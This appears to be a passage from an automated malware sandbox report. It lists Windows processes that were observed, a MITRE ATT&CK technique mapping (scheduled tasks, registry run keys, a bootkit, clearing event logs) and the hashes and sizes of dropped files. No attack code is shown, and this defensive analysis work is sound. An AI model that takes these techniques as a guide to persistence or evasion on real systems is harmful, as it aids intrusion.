C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
404B
MD5d8cf39355deab41c74ca7c59fe0d035a
SHA1edf9d1f86ac7efa6f114bbc4dc4d6a233afa03c4
SHA256a3bdabc772f2e5a80e057bc061f890e10a20b821fade16bfee60ddd55fab229e
SHA5124c2bf296e408759792d7370858175031295f4e7e391a781cd65a720adf4d1bfbbc6aab73be992c2ff3fb3d6413b2b16bae73a1a797d3c0615d599c8741bf339f
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
340B
MD55481f396cd131407530d94d88194ebd3
SHA12498c9c66c85406ba3c4a340c2378a8338ac6bb7
SHA2563b06c9822df6d081c22f67deb24b7a4ba2765648613b8f06afd36bceb97f33c5
SHA512e5dc79e90ecdbe1f7ee8722a122ce3dd476cd05265ffd327944940538603c0e236e0a842de27bab5dec894dfccaa84afff1d19b496683818d32057b0b258ab6b
-
Filesize
35KB
MD5a511516966279868f29c49bba981673b
SHA1d6e9d37f297da33fc7ae15950e8ccd8e5a2b4792
SHA256ac0ca438e575070c22819b08c8048316c722eee872525ece4f724745dee7b8aa
SHA5122712fac1d5972b9aebe97fdaad045b92a30798f1b86eb0f33d63f51abc2f2703237f32d08d6a941b720822b2151e152e437a9294f6017365682dd0d03c5a11bb
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
Filesize
32KB
-
Filesize
760KB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
156KB
-
Filesize
64KB
-
Filesize
156KB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
160KB
-
Filesize
136KB
-
Filesize
528KB
-
Filesize
8KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
760KB